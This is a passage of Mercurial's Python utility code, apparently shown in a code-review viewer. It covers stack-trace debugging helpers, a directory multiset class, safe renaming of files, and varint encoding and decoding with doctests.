3461 3461 Not be used in production code but very convenient while developing.
3462 3462 '''
3463 3463 entries = [
3464 3464 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3465 3465 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3466 3466 ][-depth:]
3467 3467 if entries:
3468 3468 fnmax = max(len(entry[0]) for entry in entries)
3469 3469 for fnln, func in entries:
3470 3470 if line is None:
3471 3471 yield (fnmax, fnln, func)
3472 3472 else:
3473 3473 yield line % (fnmax, fnln, func)
3474 3474
3475 3475
3476 3476 def debugstacktrace(
3477 3477 msg=b'stacktrace',
3478 3478 skip=0,
3479 3479 f=procutil.stderr,
3480 3480 otherf=procutil.stdout,
3481 3481 depth=0,
3482 3482 ):
3483 3483 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3484 3484 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3485 3485 By default it will flush stdout first.
3486 3486 It can be used everywhere and intentionally does not require an ui object.
3487 3487 Not be used in production code but very convenient while developing.
3488 3488 '''
3489 3489 if otherf:
3490 3490 otherf.flush()
3491 3491 f.write(b'%s at:\n' % msg.rstrip())
3492 3492 for line in getstackframes(skip + 1, depth=depth):
3493 3493 f.write(line)
3494 3494 f.flush()
3495 3495
3496 3496
3497 3497 class dirs(object):
3498 3498 '''a multiset of directory names from a dirstate or manifest'''
3499 3499
3500 3500 def __init__(self, map, skip=None):
3501 3501 self._dirs = {}
3502 3502 addpath = self.addpath
3503 3503 if isinstance(map, dict) and skip is not None:
3504 3504 for f, s in map.iteritems():
3505 3505 if s[0] != skip:
3506 3506 addpath(f)
3507 3507 elif skip is not None:
3508 3508 raise error.ProgrammingError(
3509 3509 b"skip character is only supported " b"with a dict source"
3510 3510 )
3511 3511 else:
3512 3512 for f in map:
3513 3513 addpath(f)
3514 3514
3515 3515 def addpath(self, path):
3516 3516 dirs = self._dirs
3517 3517 for base in finddirs(path):
3518 3518 if base in dirs:
3519 3519 dirs[base] += 1
3520 3520 return
3521 3521 dirs[base] = 1
3522 3522
3523 3523 def delpath(self, path):
3524 3524 dirs = self._dirs
3525 3525 for base in finddirs(path):
3526 3526 if dirs[base] > 1:
3527 3527 dirs[base] -= 1
3528 3528 return
3529 3529 del dirs[base]
3530 3530
3531 3531 def __iter__(self):
3532 3532 return iter(self._dirs)
3533 3533
3534 3534 def __contains__(self, d):
3535 3535 return d in self._dirs
3536 3536
3537 3537
3538 3538 if safehasattr(parsers, 'dirs'):
3539 3539 dirs = parsers.dirs
3540 3540
3541 3541 if rustdirs is not None:
3542 3542 dirs = rustdirs
3543 3543
3544 3544
3545 3545 def finddirs(path):
3546 3546 pos = path.rfind(b'/')
3547 3547 while pos != -1:
3548 3548 yield path[:pos]
3549 3549 pos = path.rfind(b'/', 0, pos)
3550 3550 yield b''
3551 3551
3552 3552
3553 3553 # convenient shortcut
3554 3554 dst = debugstacktrace
3555 3555
3556 3556
3557 3557 def safename(f, tag, ctx, others=None):
3558 3558 """
3559 3559 Generate a name that it is safe to rename f to in the given context.
3560 3560
3561 3561 f: filename to rename
3562 3562 tag: a string tag that will be included in the new name
3563 3563 ctx: a context, in which the new name must not exist
3564 3564 others: a set of other filenames that the new name must not be in
3565 3565
3566 3566 Returns a file name of the form oldname~tag[~number] which does not exist
3567 3567 in the provided context and is not in the set of other names.
3568 3568 """
3569 3569 if others is None:
3570 3570 others = set()
3571 3571
3572 3572 fn = b'%s~%s' % (f, tag)
3573 3573 if fn not in ctx and fn not in others:
3574 3574 return fn
3575 3575 for n in itertools.count(1):
3576 3576 fn = b'%s~%s~%s' % (f, tag, n)
3577 3577 if fn not in ctx and fn not in others:
3578 3578 return fn
3579 3579
3580 3580
3581 3581 def readexactly(stream, n):
3582 3582 '''read n bytes from stream.read and abort if less was available'''
3583 3583 s = stream.read(n)
3584 3584 if len(s) < n:
3585 3585 raise error.Abort(
3586 3586 _(b"stream ended unexpectedly" b" (got %d bytes, expected %d)")
3587 3587 % (len(s), n)
3588 3588 )
3589 3589 return s
3590 3590
3591 3591
3592 3592 def uvarintencode(value):
3593 3593 """Encode an unsigned integer value to a varint.
3594 3594
3595 3595 A varint is a variable length integer of 1 or more bytes. Each byte
3596 3596 except the last has the most significant bit set. The lower 7 bits of
3597 3597 each byte store the 2's complement representation, least significant group
3598 3598 first.
3599 3599
3600 3600 >>> uvarintencode(0)
3601 3601 '\\x00'
3602 3602 >>> uvarintencode(1)
3603 3603 '\\x01'
3604 3604 >>> uvarintencode(127)
3605 3605 '\\x7f'
3606 3606 >>> uvarintencode(1337)
3607 3607 '\\xb9\\n'
3608 3608 >>> uvarintencode(65536)
3609 3609 '\\x80\\x80\\x04'
3610 3610 >>> uvarintencode(-1)
3611 3611 Traceback (most recent call last):
3612 3612 ...
3613 3613 ProgrammingError: negative value for uvarint: -1
3614 3614 """
3615 3615 if value < 0:
3616 3616 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3617 3617 bits = value & 0x7F
3618 3618 value >>= 7
3619 3619 bytes = []
3620 3620 while value:
3621 3621 bytes.append(pycompat.bytechr(0x80 | bits))
3622 3622 bits = value & 0x7F
3623 3623 value >>= 7
3624 3624 bytes.append(pycompat.bytechr(bits))
3625 3625
3626 3626 return b''.join(bytes)
3627 3627
3628 3628
3629 3629 def uvarintdecodestream(fh):
3630 3630 """Decode an unsigned variable length integer from a stream.
3631 3631
3632 3632 The passed argument is anything that has a ``.read(N)`` method.
3633 3633
3634 3634 >>> try:
3635 3635 ... from StringIO import StringIO as BytesIO
3636 3636 ... except ImportError:
3637 3637 ... from io import BytesIO
3638 3638 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3639 3639 0
3640 3640 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3641 3641 1
3642 3642 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3643 3643 127
3644 3644 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3645 3645 1337
3646 3646 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3647 3647 65536
3648 3648 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3649 3649 Traceback (most recent call last):
3650 3650 ...
3651 3651 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3652 3652 """
3653 3653 result = 0
3654 3654 shift = 0
3655 3655 while True:
3656 3656 byte = ord(readexactly(fh, 1))
3657 3657 result |= (byte & 0x7F) << shift
3658 3658 if not (byte & 0x80):
3659 3659 return result
3660 3660 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now